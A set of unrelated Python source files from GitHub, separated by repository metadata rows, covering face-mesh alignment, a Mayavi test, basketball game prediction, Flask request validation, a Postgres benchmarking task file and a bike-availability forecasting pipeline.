v = transl_scale(v, mean, std, eg_mean, eg_std)
lmk = transl_scale(lmk, mean, std, eg_mean, eg_std)
write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x_transl_scale_fangda.obj'))
np.save(my_lmk.replace('.npy', '_x_transl_scale_fangda.npy'), lmk)
mean, std = get_vertice_mean_std(v)
print(f'my finally scan mean: {mean}, std: {std}')
# 只需要旋转并平移一下就ok了,调这个函数
def liuxu_flamefit():
eg = './data/scan.obj'
lmk = './data/scan_lmks.npy'
eg_mean, eg_std, eg_mesh = get_mean_std(eg) # mean x-y-z分开算, std整体算
eg_lmk = np.load(lmk)
print(f'my example scan mean: {eg_mean}, std: {eg_std}')
my_scan = "/mnt/cephfs/home/liuxu/cvte/tools/flame-fitting/data/new_cap/mesh/0_face.obj"
my_lmk = "/mnt/cephfs/home/liuxu/cvte/tools/flame-fitting/data/new_cap/lmk/0_face.npy"
mean, std, mesh = get_mean_std(my_scan)
lmk = np.load(my_lmk)[-51:]
v = mesh.v
print(f'my origina scan mean: {mean}, std: {std}')
v = x_rotate(v)
lmk = x_rotate(lmk)
# write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x.obj'))
# np.save(my_lmk.replace('.npy', '_x.npy'), lmk)
mean, std = get_vertice_mean_std(v)
# print(f'my rotated scan mean: {mean}, std: {std}')
v_transl = transl(v, mean, eg_mean) # 到这一步得到的obj,fit效果最好
lmk_transl = transl(lmk, mean, eg_mean)
write_simple_obj(v_transl, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x_transl.obj'))
np.save(my_lmk.replace('.npy', '_x_transl.npy'), lmk_transl)
mean_transl, std_transl = get_vertice_mean_std(v_transl)
print(f'my transla scan mean: {mean_transl}, std: {std_transl}')
# v = transl_scale(v, mean, std, eg_mean, eg_std)
# lmk = transl_scale(lmk, mean, std, eg_mean, eg_std)
# write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x_transl_scale.obj'))
# np.save(my_lmk.replace('.npy', '_x_transl_scale.npy'), lmk)
# mean, std = get_vertice_mean_std(v)
# print(f'my tra_sca scan mean: {mean}, std: {std}')
def get_lmk_meanstd(lmk):
mean = np.mean(lmk, axis=0)
std = np.std(lmk)
return mean, std
# 只需要旋转并平移一下就ok了,调这个函数
def liuxu_modify_basedon_lmk():
eg = 'data/scan.obj'
lmk = 'data/scan_lmks.npy'
eg_lmk = np.load(lmk)
eg_mean, eg_std = get_lmk_meanstd(eg_lmk) # mean x-y-z分开算, std整体算
print(f'my example lmk mean: {eg_mean}, std: {eg_std}')
my_scan = "data/lizhenliang2/lizhenliang2_down10.ply"
my_lmk = "data/lizhenliang2/lizhenliang2_picked_points.pp"
lmk = get_lmk(my_lmk)[-51:]
mean, std = get_lmk_meanstd(lmk)
mesh = Mesh(filename=my_scan)
v = mesh.v
print(f'my origina lmk mean: {mean}, std: {std}')
v = x_rotate(v)
lmk = x_rotate(lmk)
mean, std = get_lmk_meanstd(lmk)
v_transl = transl(v, mean, eg_mean) # 到这一步得到的obj,fit效果最好
lmk_transl = transl(lmk, mean, eg_mean)
write_simple_obj(v_transl, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.ply', '_x_transl_by_lmk.obj'))
np.save(my_lmk.replace('.pp', '_x_transl_by_lmk.npy'), lmk_transl)
mean_transl, std_transl = get_lmk_meanstd(lmk_transl)
print(f'my transla lmk mean: {mean_transl}, std: {std_transl}')
# v = transl_scale(v, mean, std, eg_mean, eg_std)
# lmk = transl_scale(lmk, mean, std, eg_mean, eg_std)
# write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.obj', '_x_transl_scale_by_lmk.obj'))
# np.save(my_lmk.replace('.npy', '_x_transl_scale_by_lmk.npy'), lmk)
# mean, std = get_lmk_meanstd(lmk)
# print(f'my tra_sca lmk mean: {mean}, std: {std}')
# print(f'the 13th lmk of example: {eg_lmk[13]}, my: {lmk[13]}')
def get_lmk(lmk_path):
if lmk_path.endswith('.npy'):
lmk = np.load(lmk_path)
elif lmk_path.endswith('.pp'):
lmk = load_picked_points(lmk_path)
return lmk
def stupid_test():
eg = './data/scan.obj'
eg_mean, eg_std, eg_mesh = get_mean_std(eg)
args = get_config()
save_root = join('data', args.save)
os.makedirs(save_root, exist_ok=True)
save_scan = join(save_root, args.scans)
os.makedirs(save_scan, exist_ok=True)
save_lmk = join(save_root, args.lmks)
os.makedirs(save_lmk, exist_ok=True)
scans = join('./data/test', args.scans)
for r, ds, fs in os.walk(scans):
for f in tqdm(fs):
if f.endswith("obj"):
scan_path = os.path.join(r,f)
print(scan_path)
output = join(save_scan, f)
mean, std, mesh = get_mean_std(scan_path)
moved_v = (mesh.v - mean) # 把自己的mesh移到原点并归一化
avg_v = np.mean(moved_v, axis=0)
eg_v = (eg_mesh.v - eg_mean) # 把参考mesh移到原点并归一化
avg_eg_v = np.mean(eg_v, axis=0)
print(f'my origin scan mean: {mean}, origin example mean: {eg_mean}')
print(f'my scan mean: {np.mean(moved_v, axis=0)}, example mean: {np.mean(eg_v, axis=0)}')
avg_scale = np.mean(avg_eg_v/avg_v) * 8.5
print("scale times: ", avg_scale)
scaled_v = moved_v * avg_scale # 这时的mesh应该和示例大小差不多
v = moved_v + eg_mean # 没有放大,只是移动了位置
print(f"my new mean: {np.mean(v, axis=0)}, eg_mean: {eg_mean}")
write_simple_obj(v, mesh.f if hasattr(mesh, 'f') else None, output)
# 对应修改关键点坐标
lmk_path = scan_path.replace(args.scans, args.lmks).replace('obj', 'npy')
ori_lmk = np.load(lmk_path)
ori_lmk *= [1, -1, -1]
lmk_output = join(save_lmk, f.replace('obj', 'npy'))
moved_lmk = (ori_lmk - mean)
scaled_lmk = moved_lmk * avg_scale
modified_lmk = moved_lmk + eg_mean
np.save(lmk_output, modified_lmk)
# res_lmk = o3d.geometry.PointCloud()
# res_lmk.points = o3d.utility.Vector3dVector(modified_lmk)
# res_mesh = o3d.io.read_triangle_mesh(output)
# o3d.visualization.draw_geometries([res_mesh, res_lmk, eg_mesh])
# 只需要旋转并平移一下就ok了,调这个函数
def modify(my_scan, my_lmk):
eg = 'data/scan.obj'
lmk = 'data/scan_lmks.npy'
eg_lmk = np.load(lmk)
eg_mean, eg_std = get_lmk_meanstd(eg_lmk) # mean x-y-z分开算, std整体算
logger.info(f'my example lmk mean: {eg_mean}, std: {eg_std}')
lmk = get_lmk(my_lmk)[-51:]
mean, std = get_lmk_meanstd(lmk)
mesh = Mesh(filename=my_scan)
v = mesh.v
logger.info(f'my origina lmk mean: {mean}, std: {std}')
v = x_rotate(v)
lmk = x_rotate(lmk)
mean, std = get_lmk_meanstd(lmk)
v_transl = transl(v, mean, eg_mean) # 到这一步得到的obj,fit效果最好
lmk_transl = transl(lmk, mean, eg_mean)
write_simple_obj(v_transl, mesh.f if hasattr(mesh, 'f') else None, my_scan.replace('.ply', '_x_transl_by_lmk.obj'))
np.save(my_lmk.replace('.pp', '_x_transl_by_lmk.npy'), lmk_transl)
mean_transl, std_transl = get_lmk_meanstd(lmk_transl)
logger.info(f'my transla lmk mean: {mean_transl}, std: {std_transl}')
trans = -mean + eg_mean
logger.info(f"trans: {trans}")
return my_scan.replace('.ply', '_x_transl_by_lmk.obj'), my_lmk.replace('.pp', '_x_transl_by_lmk.npy'), trans
if __name__ == '__main__':
# flamefit_test()
# liuxu_flamefit()
liuxu_modify_basedon_lmk()
|
qdmy/flame-fitting
|
modify_pointcloud.py
|
modify_pointcloud.py
|
py
| 11,254 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30353219011
|
from os.path import abspath
from io import BytesIO
import copy
# Local imports.
from common import TestCase, get_example_data
class TestOptionalCollection(TestCase):
def test(self):
self.main()
def do(self):
############################################################
# Imports.
script = self.script
from mayavi.sources.vtk_file_reader import VTKFileReader
from mayavi.filters.contour import Contour
from mayavi.filters.optional import Optional
from mayavi.filters.collection import Collection
from mayavi.filters.api import PolyDataNormals
from mayavi.modules.api import Surface
############################################################
# Create a new scene and set up the visualization.
s = self.new_scene()
# Read a VTK (old style) data file.
r = VTKFileReader()
r.initialize(get_example_data('heart.vtk'))
script.add_source(r)
c = Contour()
# `name` is used for the notebook tabs.
n = PolyDataNormals(name='Normals')
o = Optional(filter=n, label_text='Compute normals')
coll = Collection(filters=[c, o], name='IsoSurface')
script.add_filter(coll)
s = Surface()
script.add_module(s)
########################################
# do the testing.
def check(coll):
"""Check if test status is OK given the collection."""
c, o = coll.filters
c = c.filter
n = o.filter
assert coll.get_output_dataset().point_data.scalars.range == (127.5, 127.5)
# Adding a contour should create the appropriate output in
# the collection.
c.contours.append(200)
assert coll.get_output_dataset().point_data.scalars.range == (127.5, 200.0)
# the collection's output should be that of the normals.
assert coll.get_output_dataset() is n.get_output_dataset()
# disable the optional filter and check.
o.enabled = False
assert 'disabled' in o.name
assert coll.get_output_dataset() is c.get_output_dataset()
# Set back everything to original state.
c.contours.pop()
o.enabled = True
assert coll.get_output_dataset().point_data.scalars.range == (127.5, 127.5)
assert coll.get_output_dataset() is n.get_output_dataset()
assert 'disabled' not in o.name
check(coll)
############################################################
# Test if saving a visualization and restoring it works.
# Save visualization.
f = BytesIO()
f.name = abspath('test.mv2') # We simulate a file.
script.save_visualization(f)
f.seek(0) # So we can read this saved data.
# Remove existing scene.
engine = script.engine
engine.close_scene(s)
# Load visualization
script.load_visualization(f)
s = engine.current_scene
# Now do the check.
coll = s.children[0].children[0]
check(coll)
############################################################
# Test if the Mayavi2 visualization can be deep-copied.
# Pop the source object.
source = s.children.pop()
# Add it back to see if that works without error.
s.children.append(source)
# Now do the check.
coll = s.children[0].children[0]
check(coll)
# Now deepcopy the source and replace the existing one with
# the copy. This basically simulates cutting/copying the
# object from the UI via the right-click menu on the tree
# view, and pasting the copy back.
source1 = copy.deepcopy(source)
s.children[0] = source1
# Now do the check.
coll = s.children[0].children[0]
check(coll)
# If we have come this far, we are golden!
if __name__ == "__main__":
t = TestOptionalCollection()
t.test()
|
enthought/mayavi
|
integrationtests/mayavi/test_optional_collection.py
|
test_optional_collection.py
|
py
| 4,072 |
python
|
en
|
code
| 1,177 |
github-code
|
6
|
28300388553
|
import pandas as pd
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
# Load the datasets
regular_season_results = pd.read_csv('MRegularSeasonDetailedResults.csv')
tournament_results = pd.read_csv('MNCAATourneyDetailedResults.csv')
# Merge regular season and tournament results
all_game_results = pd.concat([regular_season_results, tournament_results], ignore_index=True)
# Feature engineering and dataset preparation
all_game_results['point_diff'] = all_game_results['WScore'] - all_game_results['LScore']
all_game_results['team1_shooting_percentage'] = all_game_results['WFGM'] / all_game_results['WFGA']
all_game_results['team2_shooting_percentage'] = all_game_results['LFGM'] / all_game_results['LFGA']
all_game_results['rebounds_diff'] = all_game_results['WOR'] + all_game_results['WDR'] - (all_game_results['LOR'] + all_game_results['LDR'])
all_game_results['turnovers_diff'] = all_game_results['WTO'] - all_game_results['LTO']
X = all_game_results[['point_diff', 'team1_shooting_percentage', 'team2_shooting_percentage', 'rebounds_diff', 'turnovers_diff']]
y = (all_game_results['WTeamID'] < all_game_results['LTeamID']).astype(int)
# Split data into training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
# Train a Gradient Boosting Classifier
model = GradientBoostingClassifier(random_state=42)
model.fit(X_train, y_train)
# Evaluate the model
y_pred = model.predict(X_test)
accuracy = accuracy_score(y_test, y_pred)
print(f'Model accuracy: {accuracy:.2f}')
def predict_winner(team1_id, team2_id, input_data, model):
prediction = model.predict(input_data)
return team1_id if prediction == 1 else team2_id
def calculate_team_average_stats(team_id, all_game_results):
team_games = all_game_results[(all_game_results['WTeamID'] == team_id) | (all_game_results['LTeamID'] == team_id)]
team_stats = {
'point_diff': [],
'team_shooting_percentage': [],
'rebounds_diff': [],
'turnovers_diff': []
}
for index, row in team_games.iterrows():
if row['WTeamID'] == team_id:
team_stats['point_diff'].append(row['WScore'] - row['LScore'])
team_stats['team_shooting_percentage'].append(row['WFGM'] / row['WFGA'])
team_stats['rebounds_diff'].append(row['WOR'] + row['WDR'] - (row['LOR'] + row['LDR']))
team_stats['turnovers_diff'].append(row['WTO'] - row['LTO'])
else:
team_stats['point_diff'].append(row['LScore'] - row['WScore'])
team_stats['team_shooting_percentage'].append(row['LFGM'] / row['LFGA'])
team_stats['rebounds_diff'].append(row['LOR'] + row['LDR'] - (row['WOR'] + row['WDR']))
team_stats['turnovers_diff'].append(row['LTO'] - row['WTO'])
average_stats = {
key: sum(values) / len(values)
for key, values in team_stats.items()
}
return average_stats
def predict_game(team1_id, team2_id, model, all_game_results):
team1_average_stats = calculate_team_average_stats(team1_id, all_game_results)
team2_average_stats = calculate_team_average_stats(team2_id, all_game_results)
input_data = pd.DataFrame([{
'point_diff': team1_average_stats['point_diff'] - team2_average_stats['point_diff'],
'team1_shooting_percentage': team1_average_stats['team_shooting_percentage'],
'team2_shooting_percentage': team2_average_stats['team_shooting_percentage'],
'rebounds_diff': team1_average_stats['rebounds_diff'] - team2_average_stats['rebounds_diff'],
'turnovers_diff': team1_average_stats['turnovers_diff'] - team2_average_stats['turnovers_diff']
}])
winner = predict_winner(team1_id, team2_id, input_data, model)
return winner
# Main loop for user input
while True:
print("Enter the team IDs for the two teams you want to predict (e.g. 1101 1102) or type 'exit' to quit:")
user_input = input()
if user_input.lower() == 'exit':
break
try:
team1_id, team2_id = map(int, user_input.split())
except ValueError:
print("Invalid input. Please enter two team IDs separated by a space.")
continue
winner = predict_game(team1_id, team2_id, model, all_game_results)
print(f'The predicted winner is: {winner}')
|
lakshayMahajan/March-Madness-ML
|
madness.py
|
madness.py
|
py
| 4,404 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30138290765
|
# !/usr/local/python/bin/python
# -*- coding: utf-8 -*-
# (C) Wu Dong, 2020
# All rights reserved
# @Author: 'Wu Dong <[email protected]>'
# @Time: '2020-04-09 14:39'
""" 演示自定义响应类
"""
# sys
import json
# 3p
from flask import Flask
from pre_request import BaseResponse
from pre_request import pre, Rule
class CustomResponse(BaseResponse):
def __call__(self, fuzzy=False, formatter=None, error=None):
"""
:type error: 错误
:return:
"""
result = {
"code": error.code,
"rst": {}
}
from flask import make_response # pylint: disable=import-outside-toplevel
response = make_response(json.dumps(result))
response.headers["Content-Type"] = "application/json; charset=utf-8"
return response
app = Flask(__name__)
app.config["TESTING"] = True
filter_params = {
"email": Rule(email=True)
}
@app.route("/email", methods=['get', 'post'])
@pre.catch(filter_params)
def email_resp_handler(params):
""" 测试邮件验证
"""
return str(params)
if __name__ == "__main__":
pre.add_response(CustomResponse)
resp = app.test_client().get("/email", data={
"email": "wudong@@eastwu.cn"
})
print(resp.get_data(as_text=True))
|
Eastwu5788/pre-request
|
examples/example_flask/example_response.py
|
example_response.py
|
py
| 1,281 |
python
|
en
|
code
| 55 |
github-code
|
6
|
14149751216
|
def freq_table(sentence):
"""Returns a table with occurences of each letter in the string. Case insensitive"""
sentence = sentence.lower()
sentence = sentence.replace(" ", "")
letter_dict = {}
for letter in sentence:
letter_dict[letter] = letter_dict.get(letter, 0) + 1
keys_list = list(letter_dict.keys())
keys_list.sort()
for key in keys_list:
print("{0} {1}".format(key, letter_dict[key]))
freq_table("Test case of the first sentence in this function")
|
Tomasz-Kluczkowski/Education-Beginner-Level
|
THINK LIKE A COMPUTER SCIENTIST FOR PYTHON 3/CHAPTER 20 DICTIONARIES/string frequency table.py
|
string frequency table.py
|
py
| 505 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37091297903
|
#!/usr/bin/python
from __future__ import print_function
import negspy.coordinates as nc
import sys
import argparse
from itertools import tee
def pairwise(iterable):
"s -> (s0, s1), (s2, s3), (s4, s5), ..."
a = iter(iterable)
return zip(a, a)
def main():
parser = argparse.ArgumentParser(description="""
python chr_pos_to_genome_pos.py -t 1,2:3,4
Convert chromosome,position pairs to genome_positions. Assumes that the
coordinates refer to the hg19 assembly (unless otherwise specified).
Example:
2 NM_000014 chr12 - 9220303 9268825
-> python scripts/chr_pos_to_genome_pos.py -c 3:5,3:6
2 NM_000014 genome - 2115405269 2115453791
--------------------------------
This also works with space-delimited fields:
chr5 56765,56766
->python scripts/chr_pos_to_genome_pos.py -c 1:2
genome 881683465,881683466
""")
parser.add_argument('-a', '--assembly', default='hg19')
parser.add_argument('-s', '--chromsizes-file', default=None)
parser.add_argument('-n', '--new-chrom', default=None)
parser.add_argument('-c', '--columns', default='1,2',
help="Which columns to translate to genome positions. "
"Column pairs should be 1-based and separated by colons")
#parser.add_argument('-u', '--useless', action='store_true',
# help='Another useless option')
args = parser.parse_args()
if args.chromsizes_file is not None:
chrom_info = nc.get_chrominfo_from_file(args.chromsizes_file)
else:
chrom_info = nc.get_chrominfo(args.assembly)
for line in sys.stdin:
try:
line_output = []
line_parts = line.strip().split()
translated_positions = {}
translated_chroms = {}
for translate_pair in [[int (y) for y in x.split(':')] for x in args.columns.split(',')]:
# go through the pairs of columns that need to be translated to genome position
# assume that the position column is comma separated list of values (although it doesn't
# actually need to be)
chrom,poss = line_parts[translate_pair[0]-1], line_parts[translate_pair[1]-1].strip(",").split(',')
genome_pos = ",".join(map(str,[nc.chr_pos_to_genome_pos( chrom, int(pos), chrom_info) for pos in poss]))
#line_output += [genome_pos]
# note that we've translated these columns and shouldn't include them in the output
translated_positions[translate_pair[1]-1] = genome_pos
translated_chroms[translate_pair[0]-1] = chrom
for i,part in enumerate(line_parts):
if i in translated_chroms:
# replace chromosome identifiers (e.g. 'chr1') with 'genome' to indicate the positions
if args.new_chrom is None:
line_output += ['genome({})'.format(chrom)]
else:
line_output += [args.new_chrom]
elif i in translated_positions:
# this column used to contain a position so we need to replace it with a translated
# position
line_output += [translated_positions[i]]
else:
# if this column didn't contain a translated position output it as is
line_output += [part]
try:
print("\t".join(map(str, line_output)))
except BrokenPipeError:
# Output is probably being run through "head" or something similar
break
except KeyError as ke:
print("KeyError:", ke, line.strip(), file=sys.stderr)
if __name__ == '__main__':
main()
|
pkerpedjiev/negspy
|
scripts/chr_pos_to_genome_pos.py
|
chr_pos_to_genome_pos.py
|
py
| 3,851 |
python
|
en
|
code
| 9 |
github-code
|
6
|
13767499463
|
import os
import pytest
from stips import stips_data_base
# from stips.utilities import SelectParameter
# from stips.utilities.utilities import GetParameter
@pytest.fixture(autouse=True)
def pre_post_test():
# Setup config file environment variable
config_param = None
if "stips_config" in os.environ:
config_param = os.environ["stips_config"]
del os.environ["stips_config"]
# Setup stips_data_base by renaming any possible file
if os.path.exists(os.path.join(stips_data_base, "stips_config.yaml")):
os.rename(os.path.join(stips_data_base, "stips_config.yaml"),
os.path.join(stips_data_base, "stips_config_notused.yaml"))
# this is where the test function runs
yield
# Teardown config file environment variable
if config_param is not None:
os.environ["stips_config"] = config_param
# Teardown stips_data_base config file
if os.path.exists(os.path.join(stips_data_base, "stips_config_notused.yaml")):
os.rename(os.path.join(stips_data_base, "stips_config_notused.yaml"),
os.path.join(stips_data_base, "stips_config.yaml"))
def test_local_file(data_base):
config_file = os.path.join(data_base, "override_config.yaml")
with open(config_file, "w") as conf:
conf.write("observation_distortion_enable : true")
if os.path.exists(config_file):
os.remove(config_file)
def test_environment_variable(data_base):
config_file = os.path.join(data_base, "override_config.yaml")
with open(config_file, "w") as conf:
conf.write("observation_distortion_enable : true")
os.environ['stips_config'] = config_file
if os.path.exists(config_file):
os.remove(config_file)
if 'stips_config' in os.environ:
del os.environ['stips_config']
def test_data_variable(data_base):
config_file = os.path.join(stips_data_base, "stips_config.yaml")
with open(config_file, "w") as conf:
conf.write("observation_distortion_enable : true")
if os.path.exists(config_file):
os.remove(config_file)
|
spacetelescope/STScI-STIPS
|
stips/utilities/tests/test_config.py
|
test_config.py
|
py
| 2,091 |
python
|
en
|
code
| 12 |
github-code
|
6
|
10211319525
|
# -*- coding: utf8 -*-
from django.test import TestCase
from django.apps import apps
from blog.models import ExecuteStatus, Tag
from blog.models import TestCase as TC
from django.contrib.auth.models import User
import datetime
import os
class TestCaseModelTestCase(TestCase):
def setUp(self):
#apps.get_app_config()
#user = User.objects.create_superuser()
from django.utils import timezone
created_time = timezone.now()
tags = Tag.objects.order_by('?')
tag1 = tags.first()
tag2 = tags.last()
status = ExecuteStatus.objects.create(name='Testing')
#user = User.objects.get_by_natural_key('admin')
user = User.objects.create_superuser(
username='admin1',
email='[email protected]',
password='admin')
self.testcase = TC.objects.create(
name='1234',
created_time=created_time,
abstract='This is the',
execute_status=status,
author=user,
)
#testcase.tags.add(tag1, tag2)
#testcase.save()
def test_str_representation(self):
self.assertEqual(self.testcase.__str__(), self.testcase.name)
|
charleszh/rf-web
|
DjangoDemo/blog/tests/test_models.py
|
test_models.py
|
py
| 1,209 |
python
|
en
|
code
| 0 |
github-code
|
6
|
15565393240
|
import logging
import os
from typing import List
from plumbum import cmd, local
from pathlib import Path
import doit
from doit.action import CmdAction
from constants import DEFAULT_DB, DB_USERNAME, DB_PASSWORD, VERBOSITY_DEFAULT
logging.basicConfig()
logger = logging.getLogger("dodo")
logger.setLevel(logging.DEBUG)
NOISEPAGE_PATH = Path.joinpath(Path.home(), "noisepage-pilot").absolute()
ARTIFACTS_PATH = Path.joinpath(NOISEPAGE_PATH, "artifacts/benchbase")
PROJECT_PATH = Path.joinpath(NOISEPAGE_PATH, "artifacts/project")
POSTGRES_PATH = str(Path.joinpath(Path.home(), "postgres/build/bin"))
POSTGRES_DATA_PATH = str(Path.joinpath(Path.home(), "postgresql/data"))
ARTIFACT_benchbase = Path.joinpath(ARTIFACTS_PATH, "benchbase.jar")
ARTIFACT_benchbase_results = ARTIFACT_benchbase / "results"
PSQL = "/home/kramana2/postgres/build/bin/psql"
BENCHBASE_CONFIG_TAGS = {
"scalefactor": "/parameters/scalefactor",
"time": "/parameters/works/work/time",
"rate": "/parameters/works/work/rate",
"terminals": "/parameters/terminals",
}
def task_hello():
return {"actions": ["echo 'Hello world!'"], "verbosity": VERBOSITY_DEFAULT}
def get_config_path(benchmark, config=None) -> str:
"""
Fetches the path to the config file of the given benchmark.
"""
if config is None:
config = PROJECT_PATH / f"{benchmark}_config.xml"
elif not config.startswith("/"):
config = Path(NOISEPAGE_PATH / config).absolute()
return str(config)
def task_update_log_collection():
sql_list = [
"ALTER SYSTEM SET log_destination='csvlog'",
"ALTER SYSTEM SET logging_collector='on'",
"ALTER SYSTEM SET log_statement='all'",
"ALTER SYSTEM SET log_connections='on'",
"ALTER SYSTEM SET log_disconnections='on'",
"ALTER SYSTEM SET log_directory='%(log_directory)s'",
]
return {
"actions": [
f"mkdir -p {POSTGRES_DATA_PATH}/%(log_directory)s",
*[
f'PGPASSWORD={DB_PASSWORD} {PSQL} --host=localhost --dbname={DEFAULT_DB} --username={DB_USERNAME} --command="{sql}"'
for sql in sql_list
],
],
"params": [
{
"name": "log_directory",
"long": "log_directory",
"default": "log",
},
{
"name": "log_file",
"long": "log_file",
"default": "postgresql-%Y-%m-%d_%H%M%S.log",
},
],
"verbosity": VERBOSITY_DEFAULT,
}
def task_perform_vacuum():
"""
Postgres: Performs vacuuming on the database system.
"""
return {
"actions": [
*[
f'PGPASSWORD={DB_PASSWORD} {PSQL} --host=localhost --dbname={DEFAULT_DB} --username={DB_USERNAME} --command="VACUUM;"'
],
],
"params": [],
"verbosity": VERBOSITY_DEFAULT,
}
def task_update_config():
def update_xml(benchmark, scalefactor=1, time=60, rate=10, terminals=1):
kwargs = locals().copy()
del kwargs["benchmark"]
config = get_config_path(benchmark)
logger.info(f"Updating arguments in config file {config} with values: {kwargs}")
actions = []
for param in kwargs:
# We're assuming that all keys in kwargs are in BENCHBASE_CONFIG_TAGS
key = BENCHBASE_CONFIG_TAGS[param]
value = locals()[param]
cmd = f"xmlstarlet edit --inplace --update '{key}' --value \"{value}\" {config}"
actions.append(cmd)
return "; \n".join(actions)
return {
"actions": [
CmdAction(update_xml),
],
"params": [
{
"name": "benchmark",
"long": "benchmark",
"help": "The benchmark to run.",
"default": "epinions",
},
{
"name": "scalefactor",
"long": "scalefactor",
"default": 1,
},
{
"name": "time",
"long": "time",
"default": 60, # 60s
},
{
"name": "rate",
"long": "rate",
"default": 10,
},
{
"name": "terminals",
"long": "terminals",
"default": 1,
},
],
"verbosity": VERBOSITY_DEFAULT,
}
def task_benchbase_workload_create():
"""
Benchbase: initializes the specified benchmark.
"""
def invoke_benchbase(benchmark, config, directory):
config = get_config_path(benchmark, config)
return f"echo {config}; java -jar benchbase.jar -b {benchmark} -c {config} -d {directory} --create=true --load=true"
return {
"actions": [
lambda: os.chdir(str(ARTIFACTS_PATH)),
# Invoke BenchBase.
CmdAction(invoke_benchbase),
# Reset working directory.
lambda: os.chdir(doit.get_initial_workdir()),
],
"file_dep": [ARTIFACT_benchbase],
"uptodate": [False],
"verbosity": VERBOSITY_DEFAULT,
"params": [
{
"name": "benchmark",
"long": "benchmark",
"help": "The benchmark to run.",
"default": "epinions",
},
{
"name": "config",
"long": "config",
"help": (
"The config file to use for BenchBase."
"Defaults to the config in the artifacts folder for the selected benchmark."
),
"default": None,
},
{
"name": "directory",
"long": "directory",
"default": f"{ARTIFACT_benchbase_results}",
},
],
}
def task_benchbase_run():
"""
BenchBase: run a specific benchmark.
"""
def invoke_benchbase(benchmark, config, directory, args):
config = get_config_path(benchmark, config)
return f"echo {config}; java -jar benchbase.jar -b {benchmark} -c {config} -d {directory} {args}"
return {
"actions": [
lambda: os.chdir(str(ARTIFACTS_PATH)),
# Invoke BenchBase.
CmdAction(invoke_benchbase),
# Reset working directory.
lambda: os.chdir(doit.get_initial_workdir()),
],
"file_dep": [ARTIFACT_benchbase],
"uptodate": [False],
"verbosity": VERBOSITY_DEFAULT,
"params": [
{
"name": "benchmark",
"long": "benchmark",
"help": "The benchmark to run.",
"default": "epinions",
},
{
"name": "config",
"long": "config",
"help": (
"The config file to use for BenchBase."
"Defaults to the config in the artifacts folder for the selected benchmark."
),
"default": None,
},
{
"name": "directory",
"long": "directory",
"default": f"{ARTIFACT_benchbase_results}",
},
{
"name": "args",
"long": "args",
"help": "Arguments to pass to BenchBase invocation.",
"default": "--create=false --load=false --execute=false",
},
],
}
|
karthik-ramanathan-3006/15-799-Special-Topics-in-Database-Systems
|
dodos/dodo.py
|
dodo.py
|
py
| 7,577 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8927274924
|
from datetime import datetime as dt
from datetime import timedelta
import pickle
import time
import dask.dataframe as dd
from dask.distributed import as_completed, worker_client
import numpy as np
import pandas as pd
import requests
import s3fs
BUCKET = "insulator-citi-bikecaster"
INSULATOR_URLS = [
"https://api-dev.insulator.ai/v1/time_series",
"https://ybcbwoz3w6.execute-api.us-east-1.amazonaws.com/staging/v1/time_series"
]
s3 = s3fs.S3FileSystem()
def model_key(station_id):
return f"models/station_{station_id}.pkl"
def load_model(station_id):
with s3.open(f"{BUCKET}/{model_key(station_id)}", "rb") as f:
return pickle.loads(f.read())
def load_local_model(station_id):
with open(f"models/station_{station_id}.pkl", "rb") as f:
return pickle.load(f)
def ts_to_unixtime(series):
return series.astype(np.int64) // 10 ** 9
def post_outcome(df, station_id, usernames, api_keys):
two_hours_ago = dt.now() - timedelta(hours=2)
past_two_hours = df[df["last_reported"] >= two_hours_ago]
past_two_hours = past_two_hours.sort_values("last_reported")
series_timestamps = ts_to_unixtime(past_two_hours["last_reported"]).tolist()
series_values = past_two_hours["num_bikes_available"].astype("int").tolist()
post_event(station_id, series_timestamps, series_values, "outcome", usernames, api_keys)
def post_event(station_id, series_timestamps, series_values, event_type, usernames, api_keys):
payload = {
"service_name": "bikecaster",
"model_name": "lin_reg",
"model_version": "0.1.0",
"timestamp": time.time(),
"entities": {"station_id": station_id},
"series_timestamps": series_timestamps,
"series_values": series_values
}
assert event_type in ("prediction", "outcome")
for username, api_key, insulator_url in zip(usernames, api_keys, INSULATOR_URLS):
url = f"{insulator_url}/{event_type}"
try:
response = requests.post(url, auth=(username, api_key), json=payload)
if not response:
print(f"Error posting to insulator ingest API: {response.text}")
except Exception as e:
print(e)
def make_forecast(df, station_id, usernames, api_keys):
station_df = df[df["station_id"] == station_id]
post_outcome(station_df, station_id, usernames, api_keys)
station_df = (
station_df
.set_index("last_reported")
.sort_index()
.resample("5T", label="right", closed="right")
.last()
.fillna(method="ffill")
)
y = station_df["num_bikes_available"].values.copy()
X = y.reshape(-1, 1).copy()
try:
model = load_local_model(station_id)
except:
print(f"There's no model for station {station_id}")
return False
try:
series_values = np.squeeze(model.predict(X, start_idx=len(X) - 1))
except:
print(f"Error predicting for station {station_id}")
return False
series_values = np.clip(series_values.astype(int), 0, None).astype("int").tolist()
series_timestamps = pd.date_range(
station_df.index[-1], periods=len(series_values) + 1, freq="5T"
)
# Remove the first value because it's the last value in the original data.
series_timestamps = series_timestamps[1:]
series_timestamps = ts_to_unixtime(series_timestamps).astype("int").tolist()
post_event(station_id, series_timestamps, series_values, "prediction", usernames, api_keys)
return True
def pipeline(s3_path, usernames, api_keys):
df = dd.read_csv(s3_path).compute()
df["last_reported"] = pd.to_datetime(df["last_reported"])
MIN_DATE = "2016-01-01"
df = df[df.last_reported >= MIN_DATE]
with worker_client() as client:
df_future = client.scatter(df)
futures = []
for station_id in sorted(df["station_id"].unique().tolist()):
futures.append(client.submit(make_forecast, df_future, station_id, usernames, api_keys))
total = len(futures)
success = 0
for result in as_completed(futures):
if result.result():
success += 1
if success % 50 == 0:
print(f"{success} / {total} tasks successfully completed")
print(f"Done. Final tally: {success} / {total} tasks successfully completed")
return True
|
